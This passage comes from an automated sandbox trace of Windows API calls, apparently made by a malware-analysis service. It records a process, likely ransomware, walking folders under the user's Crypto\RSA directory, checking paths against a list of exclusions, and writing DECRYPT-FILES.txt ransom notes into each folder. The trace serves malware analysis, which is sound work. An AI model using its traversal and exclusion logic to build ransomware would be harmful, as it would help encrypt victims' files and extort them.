dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.382] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.382] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.382] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.382] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.382] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa53cfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.382] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.382] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa53cfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.382] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.382] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.382] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.382] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.382] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.383] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.383] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.383] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.383] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.383] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.383] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.383] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.383] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.383] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.383] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.383] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 63 [0077.383] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.383] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\" [0077.383] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\jkbimi8.tmp" [0077.383] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.383] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.383] CloseHandle (hObject=0x0) returned 0 [0077.383] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.384] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x681f1360, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x681f1360, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0077.384] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0077.384] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0077.384] lstrcatW (in: lpString1="RSA", lpString2="\\" | out: lpString1="RSA\\") returned="RSA\\" [0077.384] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="RSA\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Program Files") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch=":\\Windows") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Games\\") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\All Users") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="AhnLab") returned 0x0 [0077.384] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.384] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 67 [0077.384] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.384] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\jkbimi8.tmp") returned 79 [0077.384] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0077.385] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 67 [0077.385] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.385] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\DECRYPT-FILES.txt") returned 85 [0077.385] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0077.386] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0077.387] CloseHandle (hObject=0x454) returned 1 [0077.387] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 67 [0077.387] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0077.387] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0077.387] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.387] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.387] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.387] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.387] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa53cfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.387] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.388] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa53cfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.388] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.388] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.388] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.388] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.388] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.388] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.388] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 67 [0077.388] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.388] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0077.389] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\jkbimi8.tmp" [0077.389] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.389] CloseHandle (hObject=0x0) returned 0 [0077.389] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.389] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xa1e34990, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e34990, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0077.389] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0077.389] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0077.389] lstrcatW (in: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="\\" | out: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0077.389] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0077.389] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Program Files") returned 0x0 [0077.389] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch=":\\Windows") returned 0x0 [0077.389] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Games\\") returned 0x0 [0077.389] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.389] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.390] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.390] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.390] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.390] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\All Users") returned 0x0 [0077.390] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.390] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.390] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.390] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="AhnLab") returned 0x0 [0077.390] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.390] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0077.390] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.390] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\jkbimi8.tmp") returned 126 [0077.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0077.392] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0077.392] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.392] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt") returned 132 [0077.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0077.399] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0077.400] CloseHandle (hObject=0x45c) returned 1 [0077.400] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0077.401] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" [0077.401] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa563120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa563120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0077.401] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.401] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa563120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa563120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.401] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.401] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.401] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xa1e34990, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e34990, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e34990, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d, dwReserved0=0x0, dwReserved1=0x0, 